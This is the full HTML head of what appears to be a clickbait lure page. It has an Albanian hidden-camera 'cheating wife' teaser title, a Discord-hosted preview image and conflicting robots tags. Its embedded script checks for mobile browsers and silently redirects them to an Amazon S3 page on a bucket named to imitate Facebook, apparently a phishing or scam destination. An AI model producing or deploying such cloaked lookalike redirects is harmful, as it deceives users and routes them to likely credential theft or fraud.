<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="219,142,105,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Gruaja e tradhtuar e kapur nga kamera e fshehtë, shikoni çfarë ndodhi më pas"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223624253203550338/fdsafewre33.png?ex=661a87e3&is=660812e3&hm=23e8cee952b6a4cb6922e6a9b48ca8a7741bf7843419d7346759c400ed0a7129&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
    //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    
        if (isMobile) {
            window.location.href = "https://faceboovbefadz217894.s3.eu-central-1.amazonaws.com/faskimng0012-brau2/mango01.html";
        }
    //]]>
    </script>
    